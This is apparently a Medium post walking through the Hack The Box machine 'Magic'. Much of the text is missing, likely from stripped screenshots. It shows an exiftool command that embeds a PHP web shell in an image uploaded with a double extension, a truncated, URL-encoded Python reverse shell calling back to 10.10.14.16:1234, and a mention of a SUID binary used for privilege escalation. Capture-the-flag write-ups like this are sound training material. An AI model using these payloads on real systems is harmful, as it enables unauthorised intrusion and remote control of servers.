Magic — HTB walkthrough


Nmap scan

aggressive scan for versions with default scripts
visiting website
#exiftool -Comment=’<?php echo “<pre>”; system($_GET[‘cmd’]); ?>’ exploit.png#cp exploit.png exploit.php.png
We get uploads.


We will access the image and get a reverse shell using cmd parameter we added in our payload.,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.14.16%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);[%22/bin/sh%22,%22-i%22]);%27
getting user.txt


Enumerating we see user theseus, have suid priv on /usr/bin/sysinfo



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Dhanishtha Awasthi

Dhanishtha Awasthi

OSCP | CEH | Cyber Security Enthusiast.